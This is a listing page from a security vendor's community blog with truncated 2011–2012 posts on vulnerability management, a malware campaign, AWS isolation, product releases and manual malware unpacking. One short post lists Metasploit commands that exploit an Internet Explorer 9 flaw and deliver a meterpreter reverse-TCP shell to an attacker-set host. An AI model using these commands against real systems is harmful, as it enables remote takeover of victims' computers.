Security Community Blog
Showing posts tagged with Critical System Protection
Gavin Fulton | 13 Dec 2012 | 0 comments

Over 6 years ago, when working for a Professional Services organization and responsible for developing key Security propositions for customers, I first developed an approach for "Vulnerability Lifecycle Management".

At the time the solution involved manual integration of a range of technologies from a range of different vendors:

  • network vulnerability assessment tool
  • patch management tool
  • compliance management tool
  • risk reduction tool (Host based IPS)
  • security intelligence feed

At that time this involved identifying a range of tools from a number of different vendors, and the associated technical and procedural integration of inputs and outputs from each. There were challenges with the different cost models to license this complex solution, let alone the technical integration of the various input and output formats.

Jumping forward from 2006 to 2012 and this type of solution is entirely...

Brandon Noble | 30 Nov 2012 | 15 comments

I. BACKGROUND:
In mid-2009, W32.Changeup was first discovered on systems around the world. Over the last few years, Symantec Security Response has profiled this threat, explained why it spreads, and shown how it was created. Since November 2012 we have seen weekly spikes in the number of W32.Changeup detections and infections. The increase in detections is a result of a renewed W32.Changeup campaign now active and in-the-wild.


II. THREAT DETAILS:
When a system is compromised, W32.Changeup may install additional malware. These secondary threats have the ability to download even...

Deb Banerjee | 16 Nov 2012 | 0 comments

Amazon Web Services (AWS) clouds offer a variety of networking security controls for segmenting and isolating EC2 instances running in that cloud. These controls address the following use cases:

  1. Isolate an EC2 instance from the public internet, e.g. make those instances inaccessible from the public internet.
  2. Isolate EC2 instances belonging to an Enterprise from EC2 instances belonging to other tenants.
  3. Within a tenant, isolate applications and departments from one another. This can also be used to isolate application tiers from one another.
  4. Isolate applications and application tiers from one another within a tenant's AWS network.

AWS Network Security Constructs

AWS offers a variety of networking constructs to implement these controls. These include VPCs, Gateways (Internet and VPN), NAT, Subnets, Routes, Security Groups and Elastic IPs. These objects would be used to implement the above controls...

James Hanlon | 15 Oct 2012 | 0 comments

Cyberspace presents an incredible amount of opportunity for today’s organisations. Connectivity, innovation, productivity and collaboration are just some of the benefits on offer. However, cyberspace presents equally significant risks. Those risks can have huge impact and visibility; it seems that a week cannot go by without another cyber incident being splashed across internet feeds, newspapers and websites. This visibility means that cyber risks have the attention of the executive management of every organisation.

Cyber risks include targeted attacks, advanced persistent threats, data loss, denial-of-service attacks, hacktivism, negligent and malicious insiders, reputational damage, cyber espionage and nation state threats. In 2011, Symantec blocked over 5.5 billion malware attacks, an 81% increase over the previous year, witnessed a 36% increase in web-based attacks and an increased focus and intensity of advanced persistent malware. Furthermore, Symantec...

Pritesh J. Chauhan | 11 Oct 2012 | 0 comments


Over the last few weeks we have been working with a number of customers who have large administrative overheads when protecting their IT Infrastructure.


When selecting a new service they have either gone to tender or bought an off-the-shelf solution upon recommendation from colleagues/friends.


Whilst this may seem great at first, over the years this has built up a number of systems, each requiring their own management systems, portals and update systems and, most importantly, lacking integration between solutions. Whilst this may seem like a large problem, it gets worse - the issue with these customers was that they had multiple products performing conflicting tasks.


One example comes from a customer who had one product designed to AV-scan the contents of a USB pen drive upon connection to the machine, and another product to encrypt USB pen drives upon connection. This is great if the admin could...

Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
We got a discovered vulnerability in IE 9 on 17/09/2012 which can be exploited using the following commands in Backtrack 5 R2

Metasploit:

- msfupdate
- use exploit/windows/browser/ie_execcommand_uaf
- set SRVHOST 192,168 ...
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192,168 ...
- exploit

Let's beware the networking.

hugs

Beverly van de Velde | 29 Mar 2012 | 0 comments

Education Enablement Services is developing a Symantec Cloud Security Essentials course that combines the CSA training in order to achieve the CCSK credential and a Symantec Certified Professional (SCP) in Cloud Security credential.

This is an open call for your experiences with reviewing, designing, or implementing security solutions in a cloud environment. These could come from situations unique to the cloud (e.g. compliance issues for systems in a public cloud) - OR - general security solutions addressed in cloud environments (e.g. how existing encryption policies were applied to a cloud architecture).

We need your:
  • Specific examples of security solutions in cloud environments
  • Example cloud architectures - good or bad - implemented by customers
  • Key questions, challenges, and concerns from customers migrating their infrastructure to...

rscovel | 19 Dec 2011 | 4 comments

Symantec Protection Center 2.1 (SPC) has been released!

The Symantec Protection Center Team is proud to announce the release of Symantec Protection Center 2.1 (2.1.0.2075), which was published today to the LiveUpdate Publishing Service. SPC 2.0 customers will be notified that an update to SPC is available for download. This is a LiveUpdate release only. This update provides fixes for a small number of defects, as well as several major enhancements.

These enhancements include:

  • New Security Audit functionality, and reports
  • New Intrusion Detection System (IDS) signature reports
  • An enhanced Specific Endpoint report
  • SPC Web Interface security certificate management
  • Updated browser compatibility

Full details are found in the SPC 2.1 Release notes (DOC4967...

Stuart_Hawkins | 16 Dec 2011 | 0 comments

Many organizations are using Critical System Protection to monitor system activity and alert if and when a host has been compromised. As the attacks to servers become more sophisticated, it’s becoming more important for organizations to block malicious activity automatically - whether the attack originates from internal or external parties - to prevent further incursion of their environment.


What has prevented a number of customers from moving to host IPS is the fear of false positives, and what impact the prevention may have on the applications or server workloads being supported.


With the most recent release of Critical System Protection, customers are now able to selectively enable prevention policies without the fear of stopping critical business processes.


Targeted Prevention Policy (available in the...

Dinesh Theerthagiri | 17 Nov 2011 | 1 comment

This article presents information on manual unpacking of protected malicious Windows executables using the OllyDbg debugger. It also involves fully rebuilding the import table so the file can be restored to its original state and executed. Many anti-virus vendors categorize UPX, NsPack, ASpack and many other PE packers as malicious software.

Packers?

A 'Packer' is a compression routine that squeezes an executable file. These programs were created to reduce disk space and make downloads faster. They make it difficult to understand the original file and tricky to match the file signature of a compressed file. Packers first process the PE's internal structures, then place the PE header, export table and import table in new structures and attach a code segment before the OEP, called the STUB, i.e. the compressed executable is shifted to the data section of the newly created file. The PE header and section header are no longer useful, since the data is compressed, meaning...